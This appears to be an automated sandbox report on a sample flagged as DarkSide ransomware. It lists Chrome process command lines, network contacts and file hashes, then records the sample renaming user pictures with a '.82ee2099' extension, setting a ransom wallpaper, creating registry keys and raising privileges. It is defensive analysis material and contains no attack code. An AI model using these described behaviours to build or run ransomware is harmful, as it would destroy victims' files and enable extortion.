"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2076 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2124 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2516 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3544 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=792 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3456 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 catsdegree.com udp
US 72.52.178.23:443 catsdegree.com tcp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.206:443 clients2.google.com tcp
NL 142.250.179.173:443 accounts.google.com tcp
US 8.8.8.8:53 edgedl.me.gvt1.com udp
US 34.104.35.123:80 edgedl.me.gvt1.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
NL 172.217.168.193:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
NL 142.251.39.110:443 tcp
NL 142.251.39.110:443 tcp
NL 142.251.39.110:443 tcp
NL 142.251.39.110:443 tcp
NL 142.251.39.110:443 tcp
NL 142.250.179.142:443 apis.google.com tcp
NL 31.13.64.35:443 tcp
NL 31.13.64.35:443 tcp
US 8.8.8.8:53 dns.google udp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
US 157.240.27.27:443 tcp
NL 142.250.179.170:443 tcp
N/A 224.0.0.251:5353 udp
NL 142.251.39.110:443 udp
US 172.67.204.233:80 cyberdefenders.org tcp
US 172.67.204.233:80 tcp
US 172.67.204.233:443 cyberdefenders.org tcp
US 104.21.78.7:443 use.fontawesome.com tcp
US 8.8.8.8:443 dns.google udp
US 104.16.18.94:443 cdnjs.cloudflare.com tcp
NL 142.250.179.170:443 udp
NL 142.250.179.195:443 update.googleapis.com tcp
US 8.8.8.8:53 dns.google udp
US 34.104.35.123:80 edgedl.me.gvt1.com tcp
US 104.21.78.7:443 tcp
NL 142.250.179.131:443 beacons.gcp.gvt2.com tcp
NL 65.9.83.4:443 tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
NL 65.9.83.62:443 script.hotjar.com tcp
NL 65.9.83.22:443 vars.hotjar.com tcp
IE 52.209.125.250:443 tcp
IE 52.17.254.223:443 tcp
IE 52.17.254.223:443 tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
NL 142.250.179.195:443 udp
US 151.101.0.176:443 js.stripe.com tcp
US 8.8.8.8:53 dns.google udp
US 151.101.2.132:443 files.cdn.thinkific.com tcp
NL 65.9.83.24:443 m.stripe.network tcp
IE 52.17.254.223:443 tcp
US 34.211.243.235:443 tcp

Files

memory/968-54-0x0000000000400000-0x000000000083B000-memory.dmp

memory/968-55-0x00000000002F0000-0x0000000000314000-memory.dmp

memory/968-56-0x0000000000020000-0x0000000000030000-memory.dmp

memory/968-57-0x00000000754B1000-0x00000000754B3000-memory.dmp

memory/968-58-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1652-59-0x000007FEFB571000-0x000007FEFB573000-memory.dmp

memory/1652-61-0x0000000002920000-0x0000000002922000-memory.dmp

memory/1652-62-0x0000000002922000-0x0000000002924000-memory.dmp

memory/1652-63-0x0000000002924000-0x0000000002927000-memory.dmp

memory/1652-60-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

memory/1652-64-0x000000001B770000-0x000000001BA6F000-memory.dmp

memory/1652-65-0x000000000292B000-0x000000000294A000-memory.dmp

\??\pipe\crashpad_1712_BRJFVGIFYYINHDUG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\5746a2d4-a368-477c-9a85-6a28ed74cf13.tmp

MD5 068343276d2982c18cbee0c88df9a673
SHA1 6ce874c11f1106580fba90d8611894be66de40e6
SHA256 9d1b4ab3a16f3f13c52db4fc3440cb181ad5807e4f07e1262d1a992d13bb8a41
SHA512 be3e17d860cb13babdfe16a8cd9e9983839241c01e48327e969459c871896cdb807df62b07fe892960db5feb8a64e8ea40903e7022b76067fbd9ba7af498b04e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 fe2713936e85049abd4456bf037d5c29
SHA1 81ea3f3ebb43d4099e21931522b0cfff51ebb4db
SHA256 01b16495da4e2fdf784fb84f78214fa96ab058d1e9f9dc1ea66924122f4c2b5c
SHA512 4fe3bfbd71c92c466182f6a77e078f4085ffe1ee26a3a4f05802ec3b4a92f39ea4ce6f990a555d130ed27ffc53b57b27cd4b7b967c6430252f86205c976e0135

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005

MD5 70ae354ce421c724f886e84c9e5bdbe6
SHA1 b1d130a83f58a34c86a18881276adb0181da23e7
SHA256 3fba20649c9805c920acacf297d0e2863eff51c3992925374d634c94781119ad
SHA512 ce20d7031a8e5d22839903d2fa9d0f357f2fc91d454c2be1878f461654d3b1623247affd8c29a44d6b6290b98e3933cf2e5b683ff473c38a605cad5281801b22

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004

MD5 c4a85e28db8384c144974acbf425787a
SHA1 c9e5832f263da2f28827e6db70383e976393952d
SHA256 0efd753008c76eb6ba7206b014cfeb2cc5dc2ea7d134fcd7045ab59f03a34151
SHA512 1a1324ff492b1808573ad0a2c4663aae461dcaefe71e80a2d190c19317701a2f3a611493d4342a50ce1e42c37e48a44465eb18294e753d32fac30df2141bce3f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003

MD5 a2a02d1cc5362a1ea22cdd844384b707
SHA1 53eb1b1402f6590a05b0049b34a5afe2eb5aae11
SHA256 32bf1d779592481ca405b57529b1e5ae5ea2c3ff427d4a54238ca489b6005b72
SHA512 96ab950c3555f1c837572d9082315c40f0281a4e54a7a478073ba7142de6e0dd58477c08ece3b1b56fa2ad39482e3dac8f7bce72e1a0a93b05eec86e5356dfda

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002

MD5 8e6367806dd66a70cb1dccfbfa959d93
SHA1 74757af565f685d7ce813bb0601b0e0c69465a7b
SHA256 97dcb049ad634d583b9f3a5bf8a9528b5e9b73ec00fe3dde65e544a7c5885249
SHA512 7024562ae7d105bc54cacec51ccc1fb7f54e300ad9290e4114084ccec8d6978b986f7d66acb95614154bd1fa314372c25df4bf2fb29048f2f9aaaa1610a6eb68

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002

MD5 22bf0e81636b1b45051b138f48b3d148
SHA1 56755d203579ab356e5620ce7e85519ad69d614a
SHA256 e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97
SHA512 a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db

MD5 9a8e0fb6cf4941534771c38bb54a76be
SHA1 92d45ac2cc921f6733e68b454dc171426ec43c1c
SHA256 9ee9211a57c3f6fa211fe0323fa8cd521e7cbffcd8ff0896645a45795dc472be
SHA512 12ed22537dcc79d53f6c7d39e92a38f8fea076d793198928f5b7a5dd1234d50a3c0b4815632f3fadf8bc4ef0499773d22bd83f961d2d0ffd8afacf471bd3a5ae

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

MD5 9da04288eaee7f27f19509adab997810
SHA1 f6ecd2dacd5283e436d91dc2f5114b110a7b2e1e
SHA256 30684ee7baee4e2c22de3c5d62c8469606ad9088269ca96d6d44ee056ea6d5bd
SHA512 7e64b31db28c7caf18e4fb9f0d8698851936584fb78db02a92199faeee36120eb43570f16b7912a2de2749456d4cbeaedc3680fdaeeaa09e5d1bc7b15e11b0fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal

MD5 7cb0dccfef4d130ce7d47a749d054dc4
SHA1 4f664de80dc5f4f65fc286bdc75964e11bbefe49
SHA256 804b0dc09f381e21f0441925fd6987944d77ac78e8a922649b4cd2f71ff58355
SHA512 b037427a5decb092db2d3f8b55d67e9c751d48dba822d729a2ebf0b7bb2a8a76c60b6093a4399b7e9452baa2c38031671e445075f384832044d2e8cfcb1d8d90

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

MD5 0eb80653c1f50a5416b4c34a66dd7287
SHA1 324f78cb5e36f3fe83dd751380552e9b1aabc2cd
SHA256 4371a3b88885f0377c44f86aefaef639952394823d574838d72cdf4845e1014d
SHA512 24fd378028da51b2eb6dc9fc5f925916d5e0fc2bee45ca2488bc1c76b9617836bc4bb1df0fa7c411e5c086ee9ce935c94a9448b3fc6474d5cd7afafe574f4aa2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG

MD5 4e6b9fb40c519dfb5ad09840080776e3
SHA1 db5a428cfda4864128678ac31fa64d19267807ce
SHA256 07a83533cb26ce9d769df0c669b7a13ca1fec4fdbbc4f144a883f6e5f250db16
SHA512 7b837a25c34e476655697ca20e474cbaa86847035234eee5f38074cea74763d08d8bdb603984e1857537cae51149e4203db6911fa35819db623852aebc5fbaa7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

MD5 fa1af62bdaf3c63591454d2631d5dd6d
SHA1 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466
SHA256 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d
SHA512 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 773f2fcd5b74a35cbb85ef5f308e5e58
SHA1 20f82e79668c02efc12b21bbb2a1a7bf7c74b8e3
SHA256 cb47593c0dbf43149dd468e07547d96ef4a72862010906f41a86aa4b985270b1
SHA512 4a8800076ed00ef2f172355cab1f90efd86bbbc9e2f1cd402940b2066ca5e7cec6acf2da60c38baa7bf039da3b0bb29a01553838d3e142cc34dfb66578c2642b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 824b0ec1a4aef15d2a357de90b404fcd
SHA1 906ad4d42f6cd892da7ffc75d01fb1abc276ac81
SHA256 ffa87a57d8bde50cd0842877894e10f9777a766f925c36297cd4102fee31b98d
SHA512 24e88cfccdba8e55c21980e0b614e11d33e87bb5841ec6ae35fb64227a15a6dfcad3f4b14c38ec8584f01d280449160937f617ca1d8cdbbaf45a079394b0d9de

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG

MD5 15554c3069a5ab63eca4b4bee420ad11
SHA1 6ecdff4345fbd251ccf91889486d0426057627c5
SHA256 e70e839b4cf998dfa2cd62474c1aca82f998dcc23e6f312189236ddc8fe4983d
SHA512 25de143dceb4659baf36ab14386427299dc67757298f4f6312a41d080b1d43aae58ab10fa98e2978c2078131171cb87a996c68d85cb81db02f4e9e76cf4650ef

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13287626619086400

MD5 840af2bf59083860db33f884c66b040c
SHA1 56658a8465bb0aaef3bbc325c09cd1b69048a904
SHA256 c14a2f41ee01779df91c239e87f7fc6f952d4f69ddac2fa93b9a6337955ae7b9
SHA512 af76c5cc19ccb1044e5f88b30683b3f3098b85212a3d4fb2180c4972e8853068e104339e5c746a83dc03ae4aba9b96419bb8fe9858914be953995b3f362ac8e6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13287626619848400

MD5 269b0fce0cd8b92a09b92441e3d5d812
SHA1 685431016488755bda152b15254d3e555b4b1a15
SHA256 d1261f7ccad90515107d41df5c9b23b409b6cb210f759aa9d06963df0710a16f
SHA512 7262815888283f7d60617d34daae233ad33335a0128d57dde5beb24d443910922f0b53aaf64d46a58e52ce4121c846e9016cd02c444745636e7c4b3276bf9868

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

MD5 e157d534c7693880ab1a318166f68c44
SHA1 3791ed384bbe52c2624438bab37af422179bea66
SHA256 71725cc6fa90a65ac8a2e3b45c5d03aa4e279e02eb4c49a1b6f3ce33d5b78c4d
SHA512 e54efa23fafbeaf6ec75e0a598c4a68663693dc9108fea72316afab9d783d3735f08d075f2b253f4620acaa2c8b86921bbceac1cbe35c2e2b550cb4722e4ac72

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

MD5 0d9f70652007603a81c7847dc3cee8da
SHA1 4a7c8341cfd657f31314690bfd9bd8f51030c5b5
SHA256 a705d9d26ed11df2f38e6c25557ccb83916b8598fe92d2ad25868f9ae89844f7
SHA512 27e34f4b5077a9bb58f30d2447c43d2ae877495bda975b33f405d5d08d03a009bf67bd24abcf70838934f17f1ec66ed1b98429ad96997cae68d0f1e0bf9ea4cc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity

MD5 2cf5c8c911eee4269a7cfc06889d9e9d
SHA1 fa6ef6012ea7f3ddd683b68cd82d83dc73460031
SHA256 086507bf5db9cd193fbe59605a1f13ddc880d33c3efa340bfa3bebfe11e27353
SHA512 c834b563e3f5c6fc0ddd11d73b87fd4eaf16b838754bdace4094fa1f293714049b29f90bb42e79d643bd28cf79108443de0b1625501a64534262d67cf899c197

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

MD5 66950e3c3e5f6035163261a735b9fae0
SHA1 b9018ce6ba3bf763974ecc8866e28be1f0c3c244
SHA256 00dfed089890350ecc2ac2b06db31d403bfff4c6d347d871499b4610fc134979
SHA512 fc11b7dcdc51545d62d87b205a801b17fae3fb427134ea8906723c637ff393ddd2ab0919e06fdb02bc74703c4aa4c51029aa4119cc721ace00085652b2194f13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

MD5 b63048c4e7e52c52053d25da30d9c5ab
SHA1 679a44d402f5ec24605719e06459f5a707989187
SHA256 389caa40ea458e84bc624a9af1e0dec60fa652b2db2b81c09b1dfe22822cc3d1
SHA512 e86c58c5a25e24f21ad79ed526a90c120a09c115f4820663bd2ebbc59e7bb1c4c418267eb77645522aa20b2c1b53fba8e31690db7bae9b21e4eff3db06316359

C:\Users\Admin\AppData\Local\Temp\075365ae-37de-4c56-b42e-4fed804cdf67.tmp

MD5 19c0d737d50feec0112fb4a48329ff04
SHA1 8d58269c40e217e4ebe82fadc27110e7930cfebe
SHA256 f519a32686ace222a22aea7c302d5bf351d0134dfbdc906582e0a4669901cfac
SHA512 02de852ba2340aab4a978be9332e26035b00e05e5638f58deaed0fe0f39944fa01781d22ba3a692505c87c3a1d212e29fac0e6995e7e2edb5421fe5d069922a3

C:\Users\Admin\AppData\Local\Temp\2bd9593e-631d-4f41-b9e1-62ae67fc52ca.tmp

MD5 2751ccef058d0cae0f78664bf150000e
SHA1 5fa719bbbf9fca57bd41eedd342710201ae6d160
SHA256 1c8f3555eeb92dbde479755ced7ccbf3337fa93358e0d32890813bcdd43b65f3
SHA512 7974566578614606816c6022d7817e4bca95c336accdd1f5985b13673c15190887eea0ad76b4d8987637fa9c2b2bdeeac6f9c921e1ee26924ad323e6a99d12fb

C:\Users\Admin\AppData\Local\Temp\1448c634-9788-4297-8cfe-538428696765.tmp

MD5 541f52e24fe1ef9f8e12377a6ccae0c0
SHA1 189898bb2dcae7d5a6057bc2d98b8b450afaebb6
SHA256 81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82
SHA512 d779d78a15c5efca51ebd6b96a7ccb6d718741bdf7d9a37f53b2eb4b98aa1a78bc4cfa57d6e763aab97276c8f9088940ac0476690d4d46023ff4bf52f3326c88

C:\Users\Admin\AppData\Local\Temp\d3cb9278-7b02-4be2-b492-56cc5b0c64df.tmp

MD5 f1140ebc420176d428c7e6cfac726733
SHA1 9f0ee1215624c03964974d366ef0813849dd5ca0
SHA256 f388e99f7df063dcbad923c85976b36d7e9c267750653c95ac7c13b2b122371c
SHA512 ee6bde45b1f14bd1994139b82fcaae5bd6ef80bf24f080cfc503adfaf400d7714270ac1974f41df6f3e8b8abe2b93b19d4a0edef8dd3a10517d896b7f60e761c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1c50c2115d4fbdf82136c7743b327842
SHA1 9bc645a9588e40b8ec41b17a15ca5771a4446f82
SHA256 e4885ffdef1fb72e2808cb1cf4f3719a6ab98528bc869a415da3dcd7bf7f2c4c
SHA512 d5de7c24f1099a81297a699218c73cd1d5cdc50d436f6cede4505c9bff2cf881143a945ec389d34564b11e9fc59430ef841358d1c37f79bb7ff9872918d37847

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-25 23:22

Reported

2022-01-25 23:29

Platform

win10-en-20211208

Max time kernel

121s

Max time network

360s

Command Line

"C:\Users\Admin\AppData\Local\Temp\mal.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\LimitGrant.crw => C:\Users\Admin\Pictures\LimitGrant.crw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\UseCompare.png.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExitResume.raw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\RegisterSwitch.crw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\UseCompare.png => C:\Users\Admin\Pictures\UseCompare.png.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\AssertRedo.raw => C:\Users\Admin\Pictures\AssertRedo.raw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\BlockMount.tiff => C:\Users\Admin\Pictures\BlockMount.tiff.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\ExitResume.raw => C:\Users\Admin\Pictures\ExitResume.raw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\ConvertFromInvoke.png => C:\Users\Admin\Pictures\ConvertFromInvoke.png.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\ConvertFromInvoke.png.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\LimitGrant.crw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\RegisterSwitch.crw => C:\Users\Admin\Pictures\RegisterSwitch.crw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\AssertRedo.raw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockMount.tiff C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockMount.tiff.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\82ee2099.BMP" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\82ee2099.BMP" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099\ = "82ee2099" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\82ee2099.ico" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
